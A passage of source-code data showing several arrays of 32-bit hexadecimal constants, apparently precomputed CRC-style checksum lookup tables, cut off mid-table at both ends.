0x78e09fa5, 0x45517379, 0xf544f56d, 0xc8f519b1, 0x8e272cd5, 0xb396c009, 0x357d26bc, 0x08ccca60, 0x4e1eff04, 0x73af13d8, 0xc3ba95cc, 0xfe0b7910, 0xb8d94c74, 0x8568a0a8}, {0x00000000, 0x69790b65, 0xd2f216ca, 0xbb8b1daf, 0x7e952bd5, 0x17ec20b0, 0xac673d1f, 0xc51e367a, 0xfd2a57aa, 0x94535ccf, 0x2fd84160, 0x46a14a05, 0x83bf7c7f, 0xeac6771a, 0x514d6ab5, 0x383461d0, 0x2125a915, 0x485ca270, 0xf3d7bfdf, 0x9aaeb4ba, 0x5fb082c0, 0x36c989a5, 0x8d42940a, 0xe43b9f6f, 0xdc0ffebf, 0xb576f5da, 0x0efde875, 0x6784e310, 0xa29ad56a, 0xcbe3de0f, 0x7068c3a0, 0x1911c8c5, 0x424b522a, 0x2b32594f, 0x90b944e0, 0xf9c04f85, 0x3cde79ff, 0x55a7729a, 0xee2c6f35, 0x87556450, 0xbf610580, 0xd6180ee5, 0x6d93134a, 0x04ea182f, 0xc1f42e55, 0xa88d2530, 0x1306389f, 0x7a7f33fa, 0x636efb3f, 0x0a17f05a, 0xb19cedf5, 0xd8e5e690, 0x1dfbd0ea, 0x7482db8f, 0xcf09c620, 0xa670cd45, 0x9e44ac95, 0xf73da7f0, 0x4cb6ba5f, 0x25cfb13a, 0xe0d18740, 0x89a88c25, 0x3223918a, 0x5b5a9aef, 0x8496a454, 0xedefaf31, 0x5664b29e, 0x3f1db9fb, 0xfa038f81, 0x937a84e4, 0x28f1994b, 0x4188922e, 0x79bcf3fe, 0x10c5f89b, 0xab4ee534, 0xc237ee51, 0x0729d82b, 0x6e50d34e, 0xd5dbcee1, 0xbca2c584, 0xa5b30d41, 0xccca0624, 0x77411b8b, 0x1e3810ee, 0xdb262694, 0xb25f2df1, 0x09d4305e, 0x60ad3b3b, 0x58995aeb, 0x31e0518e, 0x8a6b4c21, 0xe3124744, 0x260c713e, 0x4f757a5b, 0xf4fe67f4, 0x9d876c91, 0xc6ddf67e, 0xafa4fd1b, 0x142fe0b4, 0x7d56ebd1, 0xb848ddab, 0xd131d6ce, 0x6abacb61, 0x03c3c004, 0x3bf7a1d4, 0x528eaab1, 0xe905b71e, 0x807cbc7b, 0x45628a01, 0x2c1b8164, 0x97909ccb, 0xfee997ae, 0xe7f85f6b, 0x8e81540e, 0x350a49a1, 0x5c7342c4, 0x996d74be, 0xf0147fdb, 0x4b9f6274, 0x22e66911, 0x1ad208c1, 0x73ab03a4, 0xc8201e0b, 0xa159156e, 0x64472314, 0x0d3e2871, 0xb6b535de, 0xdfcc3ebb, 0xd25c4ee9, 0xbb25458c, 0x00ae5823, 0x69d75346, 0xacc9653c, 0xc5b06e59, 0x7e3b73f6, 0x17427893, 0x2f761943, 0x460f1226, 0xfd840f89, 0x94fd04ec, 0x51e33296, 0x389a39f3, 0x8311245c, 0xea682f39, 0xf379e7fc, 0x9a00ec99, 0x218bf136, 0x48f2fa53, 0x8deccc29, 0xe495c74c, 0x5f1edae3, 0x3667d186, 0x0e53b056, 0x672abb33, 0xdca1a69c, 0xb5d8adf9, 0x70c69b83, 0x19bf90e6, 0xa2348d49, 0xcb4d862c, 0x90171cc3, 0xf96e17a6, 0x42e50a09, 0x2b9c016c, 0xee823716, 0x87fb3c73, 0x3c7021dc, 0x55092ab9, 0x6d3d4b69, 0x0444400c, 0xbfcf5da3, 0xd6b656c6, 0x13a860bc, 0x7ad16bd9, 0xc15a7676, 0xa8237d13, 0xb132b5d6, 0xd84bbeb3, 0x63c0a31c, 0x0ab9a879, 0xcfa79e03, 0xa6de9566, 0x1d5588c9, 0x742c83ac, 0x4c18e27c, 0x2561e919, 0x9eeaf4b6, 0xf793ffd3, 0x328dc9a9, 0x5bf4c2cc, 0xe07fdf63, 0x8906d406, 0x56caeabd, 0x3fb3e1d8, 0x8438fc77, 0xed41f712, 0x285fc168, 0x4126ca0d, 0xfaadd7a2, 0x93d4dcc7, 0xabe0bd17, 0xc299b672, 0x7912abdd, 0x106ba0b8, 0xd57596c2, 0xbc0c9da7, 0x07878008, 0x6efe8b6d, 0x77ef43a8, 0x1e9648cd, 0xa51d5562, 0xcc645e07, 0x097a687d, 0x60036318, 0xdb887eb7, 0xb2f175d2, 0x8ac51402, 0xe3bc1f67, 0x583702c8, 0x314e09ad, 0xf4503fd7, 0x9d2934b2, 0x26a2291d, 0x4fdb2278, 0x1481b897, 0x7df8b3f2, 0xc673ae5d, 0xaf0aa538, 0x6a149342, 0x036d9827, 0xb8e68588, 0xd19f8eed, 0xe9abef3d, 0x80d2e458, 0x3b59f9f7, 0x5220f292, 0x973ec4e8, 0xfe47cf8d, 0x45ccd222, 0x2cb5d947, 0x35a41182, 0x5cdd1ae7, 0xe7560748, 0x8e2f0c2d, 0x4b313a57, 0x22483132, 0x99c32c9d, 0xf0ba27f8, 0xc88e4628, 0xa1f74d4d, 0x1a7c50e2, 0x73055b87, 0xb61b6dfd, 0xdf626698, 0x64e97b37, 0x0d907052}, {0x00000000, 0x7fc99b93, 0xff933726, 0x805aacb5, 0x2457680d, 0x5b9ef39e, 0xdbc45f2b, 0xa40dc4b8, 0x48aed01a, 0x37674b89, 0xb73de73c, 0xc8f47caf, 0x6cf9b817, 0x13302384, 0x936a8f31, 0xeca314a2, 0x915da034, 0xee943ba7, 0x6ece9712, 0x11070c81, 0xb50ac839, 0xcac353aa, 0x4a99ff1f, 0x3550648c, 0xd9f3702e, 0xa63aebbd, 0x26604708, 0x59a9dc9b, 0xfda41823, 0x826d83b0, 0x02372f05, 0x7dfeb496, 0xf9ca4629, 0x8603ddba, 0x0659710f, 0x7990ea9c, 0xdd9d2e24, 0xa254b5b7, 0x220e1902, 0x5dc78291, 0xb1649633, 0xcead0da0, 0x4ef7a115, 0x313e3a86, 0x9533fe3e, 0xeafa65ad, 0x6aa0c918, 0x1569528b, 0x6897e61d, 0x175e7d8e, 0x9704d13b, 0xe8cd4aa8, 0x4cc08e10, 0x33091583, 0xb353b936, 0xcc9a22a5, 0x20393607, 0x5ff0ad94, 0xdfaa0121, 0xa0639ab2, 0x046e5e0a, 0x7ba7c599, 0xfbfd692c, 0x8434f2bf, 0x28e58a13, 0x572c1180, 0xd776bd35, 0xa8bf26a6, 0x0cb2e21e, 0x737b798d, 0xf321d538, 0x8ce84eab, 0x604b5a09, 0x1f82c19a, 0x9fd86d2f, 0xe011f6bc, 0x441c3204, 0x3bd5a997, 0xbb8f0522, 0xc4469eb1, 0xb9b82a27, 0xc671b1b4, 0x462b1d01, 0x39e28692, 0x9def422a, 0xe226d9b9, 0x627c750c, 0x1db5ee9f, 0xf116fa3d, 0x8edf61ae, 0x0e85cd1b, 0x714c5688, 0xd5419230, 0xaa8809a3, 0x2ad2a516, 0x551b3e85, 0xd12fcc3a, 0xaee657a9, 0x2ebcfb1c, 0x5175608f, 0xf578a437, 0x8ab13fa4, 0x0aeb9311, 0x75220882, 0x99811c20, 0xe64887b3, 0x66122b06, 0x19dbb095, 0xbdd6742d, 0xc21fefbe, 0x4245430b, 0x3d8cd898, 0x40726c0e, 0x3fbbf79d, 0xbfe15b28, 0xc028c0bb, 0x64250403, 0x1bec9f90, 0x9bb63325, 0xe47fa8b6, 0x08dcbc14, 0x77152787, 0xf74f8b32, 0x888610a1, 0x2c8bd419, 0x53424f8a, 0xd318e33f, 0xacd178ac, 0x51cb1426, 0x2e028fb5, 0xae582300, 0xd191b893, 0x759c7c2b, 0x0a55e7b8, 0x8a0f4b0d, 0xf5c6d09e, 0x1965c43c, 0x66ac5faf, 0xe6f6f31a, 0x993f6889, 0x3d32ac31, 0x42fb37a2, 0xc2a19b17, 0xbd680084, 0xc096b412, 0xbf5f2f81, 0x3f058334, 0x40cc18a7, 0xe4c1dc1f, 0x9b08478c, 0x1b52eb39, 0x649b70aa, 0x88386408, 0xf7f1ff9b, 0x77ab532e, 0x0862c8bd, 0xac6f0c05, 0xd3a69796, 0x53fc3b23, 0x2c35a0b0, 0xa801520f, 0xd7c8c99c, 0x57926529, 0x285bfeba, 0x8c563a02, 0xf39fa191, 0x73c50d24, 0x0c0c96b7, 0xe0af8215, 0x9f661986, 0x1f3cb533, 0x60f52ea0, 0xc4f8ea18, 0xbb31718b, 0x3b6bdd3e, 0x44a246ad, 0x395cf23b, 0x469569a8, 0xc6cfc51d, 0xb9065e8e, 0x1d0b9a36, 0x62c201a5, 0xe298ad10, 0x9d513683, 0x71f22221, 0x0e3bb9b2, 0x8e611507, 0xf1a88e94, 0x55a54a2c, 0x2a6cd1bf, 0xaa367d0a, 0xd5ffe699, 0x792e9e35, 0x06e705a6, 0x86bda913, 0xf9743280, 0x5d79f638, 0x22b06dab, 0xa2eac11e, 0xdd235a8d, 0x31804e2f, 0x4e49d5bc, 0xce137909, 0xb1dae29a, 0x15d72622, 0x6a1ebdb1, 0xea441104, 0x958d8a97, 0xe8733e01, 0x97baa592, 0x17e00927, 0x682992b4, 0xcc24560c, 0xb3edcd9f, 0x33b7612a, 0x4c7efab9, 0xa0ddee1b, 0xdf147588, 0x5f4ed93d, 0x208742ae, 0x848a8616, 0xfb431d85, 0x7b19b130, 0x04d02aa3, 0x80e4d81c, 0xff2d438f, 0x7f77ef3a, 0x00be74a9, 0xa4b3b011, 0xdb7a2b82, 0x5b208737, 0x24e91ca4, 0xc84a0806, 0xb7839395, 0x37d93f20, 0x4810a4b3, 0xec1d600b, 0x93d4fb98, 0x138e572d, 0x6c47ccbe, 0x11b97828, 0x6e70e3bb, 0xee2a4f0e, 0x91e3d49d, 0x35ee1025, 0x4a278bb6, 0xca7d2703, 0xb5b4bc90, 0x5917a832, 0x26de33a1, 0xa6849f14, 0xd94d0487, 0x7d40c03f, 0x02895bac, 0x82d3f719, 0xfd1a6c8a}, {0x00000000, 0xa396284c, 0x9c5d56d9, 0x3fcb7e95, 0xe3cbabf3, 0x405d83bf, 0x7f96fd2a, 0xdc00d566, 0x1ce651a7, 0xbf7079eb, 0x80bb077e, 0x232d2f32, 0xff2dfa54, 0x5cbbd218, 0x6370ac8d, 0xc0e684c1, 0x39cca34e, 0x9a5a8b02, 0xa591f597, 0x0607dddb, 0xda0708bd, 0x799120f1, 0x465a5e64, 0xe5cc7628, 0x252af2e9, 0x86bcdaa5, 0xb977a430, 0x1ae18c7c, 0xc6e1591a, 0x65777156, 0x5abc0fc3, 0xf92a278f, 0x7399469c, 0xd00f6ed0, 0xefc41045, 0x4c523809, 0x9052ed6f, 0x33c4c523, 0x0c0fbbb6, 0xaf9993fa, 0x6f7f173b, 0xcce93f77, 0xf32241e2, 0x50b469ae, 0x8cb4bcc8, 0x2f229484, 0x10e9ea11, 0xb37fc25d, 0x4a55e5d2, 0xe9c3cd9e, 0xd608b30b, 0x759e9b47, 0xa99e4e21, 0x0a08666d, 0x35c318f8, 0x965530b4, 0x56b3b475, 0xf5259c39, 0xcaeee2ac, 0x6978cae0, 0xb5781f86, 0x16ee37ca, 0x2925495f, 0x8ab36113, 0xe7328d38, 0x44a4a574, 0x7b6fdbe1, 0xd8f9f3ad, 0x04f926cb, 0xa76f0e87, 0x98a47012, 0x3b32585e, 0xfbd4dc9f, 0x5842f4d3, 0x67898a46, 0xc41fa20a, 0x181f776c, 0xbb895f20, 0x844221b5, 0x27d409f9, 0xdefe2e76, 0x7d68063a, 0x42a378af, 0xe13550e3, 0x3d358585, 0x9ea3adc9, 0xa168d35c, 0x02fefb10, 0xc2187fd1, 0x618e579d, 0x5e452908, 0xfdd30144, 0x21d3d422, 0x8245fc6e, 0xbd8e82fb, 0x1e18aab7, 0x94abcba4, 0x373de3e8, 0x08f69d7d, 0xab60b531, 0x77606057, 0xd4f6481b, 0xeb3d368e, 0x48ab1ec2, 0x884d9a03, 0x2bdbb24f, 0x1410ccda, 0xb786e496, 0x6b8631f0, 0xc81019bc, 0xf7db6729, 0x544d4f65, 0xad6768ea, 0x0ef140a6, 0x313a3e33, 0x92ac167f, 0x4eacc319, 0xed3aeb55, 0xd2f195c0, 0x7167bd8c, 0xb181394d, 0x12171101, 0x2ddc6f94, 0x8e4a47d8, 0x524a92be, 0xf1dcbaf2, 0xce17c467, 0x6d81ec2b, 0x15141c31, 0xb682347d, 0x89494ae8, 0x2adf62a4, 0xf6dfb7c2, 0x55499f8e, 0x6a82e11b, 0xc914c957, 0x09f24d96, 0xaa6465da, 0x95af1b4f, 0x36393303, 0xea39e665, 0x49afce29, 0x7664b0bc, 0xd5f298f0, 0x2cd8bf7f, 0x8f4e9733, 0xb085e9a6, 0x1313c1ea, 0xcf13148c, 0x6c853cc0, 0x534e4255, 0xf0d86a19, 0x303eeed8, 0x93a8c694, 0xac63b801, 0x0ff5904d, 0xd3f5452b, 0x70636d67, 0x4fa813f2, 0xec3e3bbe, 0x668d5aad, 0xc51b72e1, 0xfad00c74, 0x59462438, 0x8546f15e, 0x26d0d912, 0x191ba787, 0xba8d8fcb, 0x7a6b0b0a, 0xd9fd2346, 0xe6365dd3, 0x45a0759f, 0x99a0a0f9, 0x3a3688b5, 0x05fdf620, 0xa66bde6c, 0x5f41f9e3, 0xfcd7d1af, 0xc31caf3a, 0x608a8776, 0xbc8a5210, 0x1f1c7a5c, 0x20d704c9, 0x83412c85, 0x43a7a844, 0xe0318008, 0xdffafe9d, 0x7c6cd6d1, 0xa06c03b7, 0x03fa2bfb, 0x3c31556e, 0x9fa77d22, 0xf2269109, 0x51b0b945, 0x6e7bc7d0, 0xcdedef9c, 0x11ed3afa, 0xb27b12b6, 0x8db06c23, 0x2e26446f, 0xeec0c0ae, 0x4d56e8e2, 0x729d9677, 0xd10bbe3b, 0x0d0b6b5d, 0xae9d4311, 0x91563d84, 0x32c015c8, 0xcbea3247, 0x687c1a0b, 0x57b7649e, 0xf4214cd2, 0x282199b4, 0x8bb7b1f8, 0xb47ccf6d, 0x17eae721, 0xd70c63e0, 0x749a4bac, 0x4b513539, 0xe8c71d75, 0x34c7c813, 0x9751e05f, 0xa89a9eca, 0x0b0cb686, 0x81bfd795, 0x2229ffd9, 0x1de2814c, 0xbe74a900, 0x62747c66, 0xc1e2542a, 0xfe292abf, 0x5dbf02f3, 0x9d598632, 0x3ecfae7e, 0x0104d0eb, 0xa292f8a7, 0x7e922dc1, 0xdd04058d, 0xe2cf7b18, 0x41595354, 0xb87374db, 0x1be55c97, 0x242e2202, 0x87b80a4e, 0x5bb8df28, 0xf82ef764, 0xc7e589f1, 0x6473a1bd, 0xa495257c, 0x07030d30, 0x38c873a5, 0x9b5e5be9, 0x475e8e8f, 0xe4c8a6c3, 0xdb03d856, 0x7895f01a}, {0x00000000, 0x2a283862, 0x545070c4, 0x7e7848a6, 0xa8a0e188, 0x8288d9ea, 0xfcf0914c, 0xd6d8a92e, 0x8a30c551, 0xa018fd33, 0xde60b595, 0xf4488df7, 0x229024d9, 0x08b81cbb, 0x76c0541d, 0x5ce86c7f, 0xcf108ce3, 0xe538b481, 0x9b40fc27, 0xb168c445, 0x67b06d6b, 0x4d985509, 0x33e01daf, 0x19c825cd, 0x452049b2, 0x6f0871d0, 0x11703976, 0x3b580114, 0xed80a83a, 0xc7a89058, 0xb9d0d8fe, 0x93f8e09c, 0x45501f87, 0x6f7827e5, 0x11006f43, 0x3b285721, 0xedf0fe0f, 0xc7d8c66d, 0xb9a08ecb, 0x9388b6a9, 0xcf60dad6, 0xe548e2b4, 0x9b30aa12, 0xb1189270, 0x67c03b5e, 0x4de8033c, 0x33904b9a, 0x19b873f8, 0x8a409364, 0xa068ab06, 0xde10e3a0, 0xf438dbc2, 0x22e072ec, 0x08c84a8e, 0x76b00228, 0x5c983a4a, 0x00705635, 0x2a586e57, 0x542026f1, 0x7e081e93, 0xa8d0b7bd, 0x82f88fdf, 0xfc80c779, 0xd6a8ff1b, 0x8aa03f0e, 0xa088076c, 0xdef04fca, 0xf4d877a8, 0x2200de86, 0x0828e6e4, 0x7650ae42, 0x5c789620, 0x0090fa5f, 0x2ab8c23d, 0x54c08a9b, 0x7ee8b2f9, 0xa8301bd7, 0x821823b5, 0xfc606b13, 0xd6485371, 0x45b0b3ed, 0x6f988b8f, 0x11e0c329, 0x3bc8fb4b, 0xed105265, 0xc7386a07, 0xb94022a1, 0x93681ac3, 0xcf8076bc, 0xe5a84ede, 0x9bd00678, 0xb1f83e1a, 0x67209734, 0x4d08af56, 0x3370e7f0, 0x1958df92, 0xcff02089, 0xe5d818eb, 0x9ba0504d, 0xb188682f, 0x6750c101, 0x4d78f963, 0x3300b1c5, 0x192889a7, 0x45c0e5d8, 0x6fe8ddba, 0x1190951c, 0x3bb8ad7e, 0xed600450, 0xc7483c32, 0xb9307494, 0x93184cf6, 0x00e0ac6a, 0x2ac89408, 0x54b0dcae, 0x7e98e4cc, 0xa8404de2, 0x82687580, 0xfc103d26, 0xd6380544, 0x8ad0693b, 0xa0f85159, 0xde8019ff, 0xf4a8219d, 0x227088b3, 0x0858b0d1, 0x7620f877, 0x5c08c015, 0xce31785d, 0xe419403f, 0x9a610899, 0xb04930fb, 0x669199d5, 0x4cb9a1b7, 0x32c1e911, 0x18e9d173, 0x4401bd0c, 0x6e29856e, 0x1051cdc8, 0x3a79f5aa, 0xeca15c84, 0xc68964e6, 0xb8f12c40, 0x92d91422, 0x0121f4be, 0x2b09ccdc, 0x5571847a, 0x7f59bc18, 0xa9811536, 0x83a92d54, 0xfdd165f2, 0xd7f95d90, 0x8b1131ef, 0xa139098d, 0xdf41412b, 0xf5697949, 0x23b1d067, 0x0999e805, 0x77e1a0a3, 0x5dc998c1, 0x8b6167da, 0xa1495fb8, 0xdf31171e, 0xf5192f7c, 0x23c18652, 0x09e9be30, 0x7791f696, 0x5db9cef4, 0x0151a28b, 0x2b799ae9, 0x5501d24f, 0x7f29ea2d, 0xa9f14303, 0x83d97b61, 0xfda133c7, 0xd7890ba5, 0x4471eb39, 0x6e59d35b, 0x10219bfd, 0x3a09a39f, 0xecd10ab1, 0xc6f932d3, 0xb8817a75, 0x92a94217, 0xce412e68, 0xe469160a, 0x9a115eac, 0xb03966ce, 0x66e1cfe0, 0x4cc9f782, 0x32b1bf24, 0x18998746, 0x44914753, 0x6eb97f31, 0x10c13797, 0x3ae90ff5, 0xec31a6db, 0xc6199eb9, 0xb861d61f, 0x9249ee7d, 0xcea18202, 0xe489ba60, 0x9af1f2c6, 0xb0d9caa4, 0x6601638a, 0x4c295be8, 0x3251134e, 0x18792b2c, 0x8b81cbb0, 0xa1a9f3d2, 0xdfd1bb74, 0xf5f98316, 0x23212a38, 0x0909125a, 0x77715afc, 0x5d59629e, 0x01b10ee1, 0x2b993683, 0x55e17e25, 0x7fc94647, 0xa911ef69, 0x8339d70b, 0xfd419fad, 0xd769a7cf, 0x01c158d4, 0x2be960b6, 0x55912810, 0x7fb91072, 0xa961b95c, 0x8349813e, 0xfd31c998, 0xd719f1fa, 0x8bf19d85, 0xa1d9a5e7, 0xdfa1ed41, 0xf589d523, 0x23517c0d, 0x0979446f, 0x77010cc9, 0x5d2934ab, 0xced1d437, 0xe4f9ec55, 0x9a81a4f3, 0xb0a99c91, 0x667135bf, 0x4c590ddd, 0x3221457b, 0x18097d19, 0x44e11166, 0x6ec92904, 0x10b161a2, 0x3a9959c0, 0xec41f0ee, 0xc669c88c, 0xb811802a, 0x9239b848}, {0x00000000, 0x4713f6fb, 0x8e27edf6, 0xc9341b0d, 0xc73eddad, 0x802d2b56, 0x4919305b, 0x0e0ac6a0, 0x550cbd1b, 0x121f4be0, 0xdb2b50ed, 0x9c38a616, 0x923260b6, 0xd521964d, 0x1c158d40, 0x5b067bbb, 0xaa197a36, 0xed0a8ccd, 0x243e97c0, 0x632d613b, 0x6d27a79b, 0x2a345160, 0xe3004a6d, 0xa413bc96, 0xff15c72d, 0xb80631d6, 0x71322adb, 0x3621dc20, 0x382b1a80, 0x7f38ec7b, 0xb60cf776, 0xf11f018d, 0x8f43f22d, 0xc85004d6, 0x01641fdb, 0x4677e920, 0x487d2f80, 0x0f6ed97b, 0xc65ac276, 0x8149348d, 0xda4f4f36, 0x9d5cb9cd, 0x5468a2c0, 0x137b543b, 0x1d71929b, 0x5a626460, 0x93567f6d, 0xd4458996, 0x255a881b, 0x62497ee0, 0xab7d65ed, 0xec6e9316, 0xe26455b6, 0xa577a34d, 0x6c43b840, 0x2b504ebb, 0x70563500, 0x3745c3fb, 0xfe71d8f6, 0xb9622e0d, 0xb768e8ad, 0xf07b1e56, 0x394f055b, 0x7e5cf3a0, 0xc5f6e21b, 0x82e514e0, 0x4bd10fed, 0x0cc2f916, 0x02c83fb6, 0x45dbc94d, 0x8cefd240, 0xcbfc24bb, 0x90fa5f00, 0xd7e9a9fb, 0x1eddb2f6, 0x59ce440d, 0x57c482ad, 0x10d77456, 0xd9e36f5b, 0x9ef099a0, 0x6fef982d, 0x28fc6ed6, 0xe1c875db, 0xa6db8320, 0xa8d14580, 0xefc2b37b, 0x26f6a876, 0x61e55e8d, 0x3ae32536, 0x7df0d3cd, 0xb4c4c8c0, 0xf3d73e3b, 0xfdddf89b, 0xbace0e60, 0x73fa156d, 0x34e9e396, 0x4ab51036, 0x0da6e6cd, 0xc492fdc0, 0x83810b3b, 0x8d8bcd9b, 0xca983b60, 0x03ac206d, 0x44bfd696, 0x1fb9ad2d, 0x58aa5bd6, 0x919e40db, 0xd68db620, 0xd8877080, 0x9f94867b, 0x56a09d76, 0x11b36b8d, 0xe0ac6a00, 0xa7bf9cfb, 0x6e8b87f6, 0x2998710d, 0x2792b7ad, 0x60814156, 0xa9b55a5b, 0xeea6aca0, 0xb5a0d71b, 0xf2b321e0, 0x3b873aed, 0x7c94cc16, 0x729e0ab6, 0x358dfc4d, 0xfcb9e740, 0xbbaa11bb, 0x509cc277, 0x178f348c, 0xdebb2f81, 0x99a8d97a, 0x97a21fda, 0xd0b1e921, 0x1985f22c, 0x5e9604d7, 0x05907f6c, 0x42838997, 0x8bb7929a, 0xcca46461, 0xc2aea2c1, 0x85bd543a, 0x4c894f37, 0x0b9ab9cc, 0xfa85b841, 0xbd964eba, 0x74a255b7, 0x33b1a34c, 0x3dbb65ec, 0x7aa89317, 0xb39c881a, 0xf48f7ee1, 0xaf89055a, 0xe89af3a1, 0x21aee8ac, 0x66bd1e57, 0x68b7d8f7, 0x2fa42e0c, 0xe6903501, 0xa183c3fa, 0xdfdf305a, 0x98ccc6a1, 0x51f8ddac, 0x16eb2b57, 0x18e1edf7, 0x5ff21b0c, 0x96c60001, 0xd1d5f6fa, 0x8ad38d41, 0xcdc07bba, 0x04f460b7, 0x43e7964c, 0x4ded50ec, 0x0afea617, 0xc3cabd1a, 0x84d94be1, 0x75c64a6c, 0x32d5bc97, 0xfbe1a79a, 0xbcf25161, 0xb2f897c1, 0xf5eb613a, 0x3cdf7a37, 0x7bcc8ccc, 0x20caf777, 0x67d9018c, 0xaeed1a81, 0xe9feec7a, 0xe7f42ada, 0xa0e7dc21, 0x69d3c72c, 0x2ec031d7, 0x956a206c, 0xd279d697, 0x1b4dcd9a, 0x5c5e3b61, 0x5254fdc1, 0x15470b3a, 0xdc731037, 0x9b60e6cc, 0xc0669d77, 0x87756b8c, 0x4e417081, 0x0952867a, 0x075840da, 0x404bb621, 0x897fad2c, 0xce6c5bd7, 0x3f735a5a, 0x7860aca1, 0xb154b7ac, 0xf6474157, 0xf84d87f7, 0xbf5e710c, 0x766a6a01, 0x31799cfa, 0x6a7fe741, 0x2d6c11ba, 0xe4580ab7, 0xa34bfc4c, 0xad413aec, 0xea52cc17, 0x2366d71a, 0x647521e1, 0x1a29d241, 0x5d3a24ba, 0x940e3fb7, 0xd31dc94c, 0xdd170fec, 0x9a04f917, 0x5330e21a, 0x142314e1, 0x4f256f5a, 0x083699a1, 0xc10282ac, 0x86117457, 0x881bb2f7, 0xcf08440c, 0x063c5f01, 0x412fa9fa, 0xb030a877, 0xf7235e8c, 0x3e174581, 0x7904b37a, 0x770e75da, 0x301d8321, 0xf929982c, 0xbe3a6ed7, 0xe53c156c, 0xa22fe397, 0x6b1bf89a, 0x2c080e61, 0x2202c8c1, 0x65113e3a, 0xac252537, 0xeb36d3cc}, {0x00000000, 0xa13984ee, 0x99020f9d, 0x383b8b73, 0xe975197b, 0x484c9d95, 0x707716e6, 0xd14e9208, 0x099b34b7, 0xa8a2b059, 0x90993b2a, 0x31a0bfc4, 0xe0ee2dcc, 0x41d7a922, 0x79ec2251, 0xd8d5a6bf, 0x1336696e, 0xb20fed80, 0x8a3466f3, 0x2b0de21d, 0xfa437015, 0x5b7af4fb, 0x63417f88, 0xc278fb66, 0x1aad5dd9, 0xbb94d937, 0x83af5244, 0x2296d6aa, 0xf3d844a2, 0x52e1c04c, 0x6ada4b3f, 0xcbe3cfd1, 0x266cd2dc, 0x87555632, 0xbf6edd41, 0x1e5759af, 0xcf19cba7, 0x6e204f49, 0x561bc43a, 0xf72240d4, 0x2ff7e66b, 0x8ece6285, 0xb6f5e9f6, 0x17cc6d18, 0xc682ff10, 0x67bb7bfe, 0x5f80f08d, 0xfeb97463, 0x355abbb2, 0x94633f5c, 0xac58b42f, 0x0d6130c1, 0xdc2fa2c9, 0x7d162627, 0x452dad54, 0xe41429ba, 0x3cc18f05, 0x9df80beb, 0xa5c38098, 0x04fa0476, 0xd5b4967e, 0x748d1290, 0x4cb699e3, 0xed8f1d0d, 0x4cd9a5b8, 0xede02156, 0xd5dbaa25, 0x74e22ecb, 0xa5acbcc3, 0x0495382d, 0x3caeb35e, 0x9d9737b0, 0x4542910f, 0xe47b15e1, 0xdc409e92, 0x7d791a7c, 0xac378874, 0x0d0e0c9a, 0x353587e9, 0x940c0307, 0x5fefccd6, 0xfed64838, 0xc6edc34b, 0x67d447a5, 0xb69ad5ad, 0x17a35143, 0x2f98da30, 0x8ea15ede, 0x5674f861, 0xf74d7c8f, 0xcf76f7fc, 0x6e4f7312, 0xbf01e11a, 0x1e3865f4, 0x2603ee87, 0x873a6a69, 0x6ab57764, 0xcb8cf38a, 0xf3b778f9, 0x528efc17, 0x83c06e1f, 0x22f9eaf1, 0x1ac26182, 0xbbfbe56c, 0x632e43d3, 0xc217c73d, 0xfa2c4c4e, 0x5b15c8a0, 0x8a5b5aa8, 0x2b62de46, 0x13595535, 0xb260d1db, 0x79831e0a, 0xd8ba9ae4, 0xe0811197, 0x41b89579, 0x90f60771, 0x31cf839f, 0x09f408ec, 0xa8cd8c02, 0x70182abd, 0xd121ae53, 0xe91a2520, 0x4823a1ce, 0x996d33c6, 0x3854b728, 0x006f3c5b, 0xa156b8b5, 0x99b34b70, 0x388acf9e, 0x00b144ed, 0xa188c003, 0x70c6520b, 0xd1ffd6e5, 0xe9c45d96, 0x48fdd978, 0x90287fc7, 0x3111fb29, 0x092a705a, 0xa813f4b4, 0x795d66bc, 0xd864e252, 0xe05f6921, 0x4166edcf, 0x8a85221e, 0x2bbca6f0, 0x13872d83, 0xb2bea96d, 0x63f03b65, 0xc2c9bf8b, 0xfaf234f8, 0x5bcbb016, 0x831e16a9, 0x22279247, 0x1a1c1934, 0xbb259dda, 0x6a6b0fd2, 0xcb528b3c, 0xf369004f, 0x525084a1, 0xbfdf99ac, 0x1ee61d42, 0x26dd9631, 0x87e412df, 0x56aa80d7, 0xf7930439, 0xcfa88f4a, 0x6e910ba4, 0xb644ad1b, 0x177d29f5, 0x2f46a286, 0x8e7f2668, 0x5f31b460, 0xfe08308e, 0xc633bbfd, 0x670a3f13, 0xace9f0c2, 0x0dd0742c, 0x35ebff5f, 0x94d27bb1, 0x459ce9b9, 0xe4a56d57, 0xdc9ee624, 0x7da762ca, 0xa572c475, 0x044b409b, 0x3c70cbe8, 0x9d494f06, 0x4c07dd0e, 0xed3e59e0, 0xd505d293, 0x743c567d, 0xd56aeec8, 0x74536a26, 0x4c68e155, 0xed5165bb, 0x3c1ff7b3, 0x9d26735d, 0xa51df82e, 0x04247cc0, 0xdcf1da7f, 0x7dc85e91, 0x45f3d5e2, 0xe4ca510c, 0x3584c304, 0x94bd47ea, 0xac86cc99, 0x0dbf4877, 0xc65c87a6, 0x67650348, 0x5f5e883b, 0xfe670cd5, 0x2f299edd, 0x8e101a33, 0xb62b9140, 0x171215ae, 0xcfc7b311, 0x6efe37ff, 0x56c5bc8c, 0xf7fc3862, 0x26b2aa6a, 0x878b2e84, 0xbfb0a5f7, 0x1e892119, 0xf3063c14, 0x523fb8fa, 0x6a043389, 0xcb3db767, 0x1a73256f, 0xbb4aa181, 0x83712af2, 0x2248ae1c, 0xfa9d08a3, 0x5ba48c4d, 0x639f073e, 0xc2a683d0, 0x13e811d8, 0xb2d19536, 0x8aea1e45, 0x2bd39aab, 0xe030557a, 0x4109d194, 0x79325ae7, 0xd80bde09, 0x09454c01, 0xa87cc8ef, 0x9047439c, 0x317ec772, 0xe9ab61cd, 0x4892e523, 0x70a96e50, 0xd190eabe, 0x00de78b6, 0xa1e7fc58, 0x99dc772b, 0x38e5f3c5}, {0x00000000, 0xe81790a1, 0x0b5e2703, 0xe349b7a2, 0x16bc4e06, 0xfeabdea7, 0x1de26905, 0xf5f5f9a4, 0x2d789c0c, 0xc56f0cad, 0x2626bb0f, 0xce312bae, 0x3bc4d20a, 0xd3d342ab, 0x309af509, 0xd88d65a8, 0x5af13818, 0xb2e6a8b9, 0x51af1f1b, 0xb9b88fba, 0x4c4d761e, 0xa45ae6bf, 0x4713511d, 0xaf04c1bc, 0x7789a414, 0x9f9e34b5, 0x7cd78317, 0x94c013b6, 0x6135ea12, 0x89227ab3, 0x6a6bcd11, 0x827c5db0, 0xb5e27030, 0x5df5e091, 0xbebc5733, 0x56abc792, 0xa35e3e36, 0x4b49ae97, 0xa8001935, 0x40178994, 